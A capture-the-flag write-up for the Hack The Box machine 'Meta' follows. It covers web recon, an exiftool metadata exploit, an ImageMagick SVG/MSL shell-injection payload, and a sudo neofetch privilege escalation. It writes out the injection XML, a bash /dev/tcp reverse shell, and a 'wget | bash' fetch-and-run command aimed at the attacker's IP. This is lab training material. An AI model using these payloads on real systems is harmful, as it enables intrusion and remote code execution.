Meta

Created At: Updated At:

Recon

└──╼ $sudo nmap -p- -A artcorp.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 19:22 UTC
Nmap scan report for artcorp.htb (10.129.178.202)
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
|   256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Home
|_http-server-header: Apache
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT      ADDRESS
1   31.53 ms 10.10.14.1
2   31.83 ms 10.129.178.202

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.70 seconds
└──╼ $ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.artcorp.htb -fc 301 -t 100

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://FUZZ.artcorp.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 301
________________________________________________

dev01                   [Status: 200, Size: 247, Words: 16, Lines: 10, Duration: 3076ms]
└──╼ $gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u artcorp.htb
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://artcorp.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 234] [--> http://artcorp.htb/assets/]
/css                  (Status: 301) [Size: 231] [--> http://artcorp.htb/css/]

Checking out the main site gives us not much of value. Links don’t go anywhere, so we have to focus on the interesting subdomain.

The subdomain:

Link goes to:

CVE-2021-22204

If the site is analyzing metadata, then the first thought is exploiting metadata analyzer.

The first resoult is: https://github.com/OneSecCyber/JPEG_RCE, so why not give it a go.
Exploit works exactly as in POC, but for some reason reverse shell from it doesnt work.
Searching github for CVE-2021-22204 fortunetly gets us more options.

And we are in.
For QoL, we can get shell stablisation.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z
stty raw -echo; fg

User access

Running linenum returns nothing of value.
Running linpeas tells us to check for:

  1. Sudo version 1.8.27

  2. [CVE-2019-13272] PTRACE_TRACEME

    Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
    Exposure: highly probable
    Tags: ubuntu=16.04{kernel:4.15.0-},ubuntu=18.04{kernel:4.15.0-},debian=9{kernel:4.9.0-},[ debian=10{kernel:4.19.0-} ],fedora=30{kernel:5.0.9-*}
    Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
    ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
    Comments: Requires an active PolKit agent.

  3. lrwxrwxrwx 1 root root 35 Aug 29 2021 /etc/apache2/sites-enabled/artcorp.htb.conf -> …/sites-available/artcorp.htb.conf

So checking:

  1. Seems to be vulnerable, but cant run it without user password.
  2. Doesnt seem to work on our machine.
  3. This file doesnt exist and we cant create it.

Then we can run pspy to inspect what is going on the sysem.
It seems to run a few scripts on regular basis.

2024/08/18 17:59:01 CMD: UID=1000 PID=4389 | /bin/bash /usr/local/bin/convert_images.sh
2024/08/18 18:00:01 CMD: UID=1000 PID=4405 | pkill mogrify

www-data@meta:/usr/local/bin$ mogrify --version
Version: ImageMagick 7.0.10-36 Q16 x86_64 2021-08-29 https://imagemagick.org
Copyright: © 1999-2020 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): fontconfig freetype jng jpeg png x xml zlib

Looking for “ImageMagick 7.0.10-36 CVE” gets us CVE-2020-29599.
https://nvd.nist.gov/vuln/detail/CVE-2020-29599
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

<image authenticate='ff" `echo $(id)> ./0wned`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

The POC did work, but it made me mad. Two things:

  1. The files in /var/www/dev01.artcorp.htb/convert_images are getting deleted every minute.
  2. <image xlink:href="msl:poc.svg" height="100" width="100"/> line has to has to have name of the file in it, which I obviously missed.
  3. Making the script run bash -i >& /dev/tcp/10.10.14.81/4444 0>&1

I ended creating a sh script and running it with wget, after wasting way too much time here.

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.81/4444 0>&1
wget -O - 10.10.14.81/shell.sh | bash

and changing the poc to:

<image authenticate='ff" `wget -O - 10.10.14.81/shell.sh | bash`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink=$
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

Stabilize the shell and finally we can get the user flag for thomas.

Priv esc

Running linenum.sh gives us

[+] We can sudo without supplying a password!
Matching Defaults entries for thomas on meta:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XDG_CONFIG_HOME

User thomas may run the following commands on meta:
    (root) NOPASSWD: /usr/bin/neofetch \"\"

Going to gtfobins gives us what we want.
https://gtfobins.github.io/gtfobins/neofetch/

We cant run exactly that, as we cannot pass any arguments to neofetch.
Adding exec /bin/sh at the end of the ~/.config/neofetch did not seem to work.

Looking again at sudo -l we can see that the only env value being kept is XDG_COFNIG_HOME. We can set it using export XDG_CONFIG_HOME=/home/thomas/.config. It works!